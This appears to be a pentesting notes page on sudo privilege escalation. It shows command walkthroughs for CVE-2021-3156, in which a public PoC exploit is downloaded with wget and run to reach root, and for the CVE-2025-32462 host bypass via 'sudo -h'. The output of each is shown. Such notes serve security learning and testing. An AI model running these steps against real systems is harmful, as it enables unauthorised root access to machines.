Sudo
SudoEdit
sudo < 1.9.5p2 is susceptible to a heap-based buffer overflow (CVE-2021-3156) and a PoC is available.
# Check the target's sudo version
$ sudo --version
Sudo version 1.8.31
# Download the PoC to the target
$ wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py
# Assign execute permissions
$ chmod +x exploit_nss.py
# Run the exploit
$ ./exploit_nss.py
...
# id
uid=0(root) gid=0(root) groups=0(root),998(apache),1004(anita)Host Bypass
Sudo versions < 1.9.17p1 are vulnerable to CVE-2025-32462. If the sudoers file lists a host that isn't the current machine (and isn't ALL), users could exploit that to run commands as if they were on that other host.
For example, in the below sudoers configuration:
# Host alias specification
Host_Alias SERVERS = host-1.example.local, host-2.example.local
Host_Alias PROD = host-1.example.local
x7331 SERVERS, !PROD = NOPASSWD:ALLThe rule expands to...
(host-1.example.local, host-2.example.local) and NOT (host-1.example.local)...which evaluates to only host-2.example.local — so it permits x7331 NOPASSWD on host-2:
# Test for sudo privileges
x7331@host-1:~$ sudo -l
Password:
Sorry, user x7331 may not run sudo on host-1.
# Test sudo with the internal host referenced in logs
x7331@host-1:~$ sudo -h host-2.example.local -l
Matching Defaults entries for x7331 on host-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User user may run the following commands on host-2:
(root) NOPASSWD: ALL
(root) NOPASSWD: ALL
Last updated
Was this helpful?